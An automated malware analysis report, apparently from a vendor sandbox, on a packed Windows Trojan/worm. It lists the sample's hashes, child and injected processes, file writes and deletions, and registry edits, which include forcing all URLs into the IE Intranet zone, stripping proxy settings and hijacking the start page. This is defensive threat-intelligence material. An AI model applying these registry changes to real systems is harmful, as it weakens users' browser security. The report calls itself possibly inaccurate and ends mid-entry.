Gen.Variant.Graftor.94620_30ebd5248b
HEUR:Trojan.Win32.Invader (Kaspersky), Gen:Variant.Graftor.94620 (AdAware), WormAutoItGen.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, Worm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 30ebd5248bf939f8574924d0cd76a554
SHA1: 2a3cadbb1580d6e49fbc1486af7f7575ee902152
SHA256: 801921336350618643de072464dd29f0f46bf2ba49535cd2d7a806dda9070af2
SSDeep: 24576:/NBI/KyLqpALIYXjEAI8LDrrAJEWXR17lP3Dk:o9qpwIYTEs EUvlvg
Size: 1049992 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2013-12-01 10:08:23
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
nvsvc32.exe:2604
MainPro.exe:604
desk.exe:3840
ndis500.exe:2464
ping.exe:496
ping.exe:1388
YP.exe:1236
ndsqp.exe:2428
%original file name%.exe:1532
lgsoyx.exe:3824
shock.exe:3848
The Trojan injects its code into the following process(es):
MainProX.exe:600
Explorer.EXE:880
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process nvsvc32.exe:2604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\clk.ini (82 bytes)
%WinDir%\run.bat (196 bytes)
%WinDir%\c4ud.dll (1753 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@abmr[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@aaa[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@twitter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@rambler[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adnxs[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adgear[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[3].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tns-counter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@scorecardresearch[2].txt (0 bytes)
The process MainPro.exe:604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHIRGNID\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXUVKHUF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EL03V57J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O6JANU0T\desktop.ini (67 bytes)
The process desk.exe:3840 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXUVKHUF\190[1].ico (5930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EL03V57J\178[1].ico (3595 bytes)
%WinDir%\Ymb\deskico\cfg.ini (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O6JANU0T\184[1].ico (6341 bytes)
%Documents and Settings%\%current user%\Desktop\»ð±¬ÓÎ÷.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\棋牌大厅.lnk (1 bytes)
%WinDir%\Ymb\deskico\184.ico (5882 bytes)
%WinDir%\Ymb\deskico\178.ico (2390 bytes)
%Documents and Settings%\%current user%\Desktop\´«Ææ°Ãâ€Ãƒâ€™Ã‚µ.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHIRGNID\cfg[1].ini (275 bytes)
%WinDir%\Ymb\deskico\190.ico (5882 bytes)
The process ndis500.exe:2464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\drivers\uniconfi.dat (4447 bytes)
%WinDir%\Ymb\sys32\ndisweb.log (491 bytes)
%System%\drivers\ZWebNds.sys (16 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (180 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat0 (8 bytes)
The Trojan deletes the following file(s):
%WinDir%\Ymb\sys32\ndisweb_new.dat0 (0 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (0 bytes)
%System%\drivers\uniconfi.dat (0 bytes)
The process YP.exe:1236 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Ymb\sys32\shock.exe (1493 bytes)
%System%\tl.dat (8 bytes)
%System%\bc.dat (1784 bytes)
%System%\tl.txt (388 bytes)
%System%\safe.dat (3780 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\hfftcbc.txt (601 bytes)
%WinDir%\Ymb\sys32\shock.txt (36452 bytes)
%WinDir%\Ymb\sys32\ndis500.txt (43108 bytes)
%WinDir%\Ymb\sys32\tray.txt (144098 bytes)
%WinDir%\Ymb\wow64\nvsvc32.txt (132327 bytes)
%WinDir%\Ymb\wow64\nvsvc32.exe (7715 bytes)
%WinDir%\Ymb\sys32\ndis500.exe (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vcnpoku.txt (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\suqpotb.txt (2321 bytes)
%System%\bc.txt (85868 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qxoxvnm.txt (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ognbetd.txt (7345 bytes)
%WinDir%\Ymb\sys32\ndsqp.exe (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sgotxct.txt (7547 bytes)
%WinDir%\Ymb\sys32\urlnav.txt (14076 bytes)
%WinDir%\Ymb\First.txt (18796 bytes)
%WinDir%\Ymb\sys32\ndsqp.txt (12588 bytes)
%WinDir%\Ymb\sys32\urlnav.dll (83 bytes)
%WinDir%\Ymb\lgsoyx.exe (110 bytes)
%WinDir%\Ymb\deskico\desk.exe (299 bytes)
%WinDir%\Ymb\deskico\desk.txt (50796 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mopdaqf.txt (4545 bytes)
%System%\safe.txt (122772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmifumt.txt (2105 bytes)
%WinDir%\Ymb\flist.bin (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\gktmoij.txt (11 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%System%\appmon.txt (63836 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wohbhrb.txt (673 bytes)
The process ndsqp.exe:2428 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\drivers\uniconfi.dat (8 bytes)
%WinDir%\Ymb\sys32\ndisweb.log (142 bytes)
%System%\drivers\ZWebNds.sys (16 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (5 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat0 (8 bytes)
The Trojan deletes the following file(s):
%WinDir%\ax01.da0 (0 bytes)
%System%\drivers\ZWebNds.sys (0 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (0 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat0 (0 bytes)
The process %original file name%.exe:1532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\jwxf\start.bat (99 bytes)
%WinDir%\jwxf\yp.exe (5033 bytes)
%WinDir%\jwxf\MainProX.exe (1660 bytes)
%WinDir%\jwxf\userip.ipb (936 bytes)
%WinDir%\jwxf\MainPro.exe (18513 bytes)
The Trojan deletes the following file(s):
%WinDir%\jwxf\__tmp_rar_sfx_access_check_1215828 (0 bytes)
The process shock.exe:3848 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Ymb\sys32\shock.dll (931 bytes)
Registry activity
The process nvsvc32.exe:2604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 88 7E 8E 2A B1 89 90 B7 C0 10 E6 23 84 4F E4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"TabProcGrowth" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"DisableDeleteBrowsingHistory" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{e2e2dd38-d088-4134-82b7-f2ba38496583}]
The process MainPro.exe:604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 24 91 72 F9 3D AC 19 17 17 80 C6 18 67 0D C1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroAvd"
The process desk.exe:3840 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnOnZoneCrossing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnOnHTTPSToHTTPRedirect" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 01 C7 41 95 5F 3E 03 36 3C 0D 64 27 3F F0 C6"
[HKCR\DeskIcon]
"(Default)" = "1000_7959"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security zone settings so that all local web nodes with no dots in their name, which would otherwise belong to no zone, are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process ndis500.exe:2464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 A6 E3 93 65 77 35 D2 A6 8E A8 2A E5 06 0A C2"
The process ping.exe:496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF 82 14 14 8F 43 3B 31 DE 58 30 AF E3 CC B3 C0"
The process ping.exe:1388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 9C 96 6D E4 F8 59 78 F8 EB 6F 6C E8 DE 81 11"
The process MainProX.exe:600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 42 B8 19 EF A9 FA C9 A6 20 CC 25 93 DB D2 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://123.sogou.com/?71084-9278"
"Search Page" = "http://123.sogou.com/?71084-9278"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "http://123.sogou.com/?71084-9278"
"Search Page" = "http://123.sogou.com/?71084-9278"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://123.sogou.com/?71084-9278"
The process YP.exe:1236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC E8 51 1F 1F 3F 45 A4 EF C9 06 73 8A B3 2A 77"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process ndsqp.exe:2428 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F 54 F1 DA CF 13 32 D6 ED 49 8C E8 4F 5A 90 B6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security zone settings so that all local web nodes with no dots in their name, which would otherwise belong to no zone, are mapped to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\ZWebNds\Enum]
[HKLM\System\CurrentControlSet\Services\ZWebNds\Security]
[HKLM\System\CurrentControlSet\Services\ZWebNds]
The process %original file name%.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 6A 4E 88 BE 58 91 12 29 00 09 17 5E BD C9 B7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\WinRAR SFX]
"c%%windows%jwxf" = "c:\windows\jwxf"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:\windows\jwxf]
"start.bat" = "start"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security zone settings so that all local web nodes with no dots in their name, which would otherwise belong to no zone, are mapped to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The process lgsoyx.exe:3824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
